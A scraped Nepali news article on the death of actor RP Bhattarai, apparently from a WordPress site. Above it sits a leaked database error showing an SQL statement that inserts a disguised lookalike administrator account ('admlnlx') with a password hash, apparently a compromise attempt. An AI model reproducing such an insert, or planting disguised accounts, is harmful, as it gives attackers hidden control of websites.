WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMCJ4Dkqxnh8sjnIFvaVHsMs/Os.en1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 05:57:48', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २४-
लामो समयदेखि नेपाली कलाकारिता क्षेत्रमा सक्रिय कलाकार आरपी भट्टराइको निधन भएको छ । ४ दिन अगाडि उनी काठमाडौंबाट आफ्नो घर विराटनगर गएका थिए . बिहीबार बेलुकी फूपूको घरमा गएका आरपी बिहान मृत अवस्थामा भेटिएका थिए ।
बेलुकी खाना खाएर सुतेका आरपी बिहान मृत भेटिएको खबर उनको फूपूको परिवारले दिएको छ । ४२ बर्षका आरपी प्रेसर र सुगर रोगबाट पीडित थिए ।
पछिल्लो समय उनले अभिनय गरेको चलचित्र ‘छक्का पन्जा’ अहिले हलमा चलिरहेको छ । उनले चलचित्र ‘वडा नम्बर ६’ लगायतका केहि सफल चलचित्रमा काम गरेका छन् । हाँस्य सिरियल ‘तितो सत्य’मा काम गरेपछि उनको चर्चा चुलिएको थियो । यहि, सिरियलबाट उनलाई ‘राजालाम’ उपनामले दर्शकले चिन्ने गर्थे ।उनको श्रीमति र २ छोरा छन् ।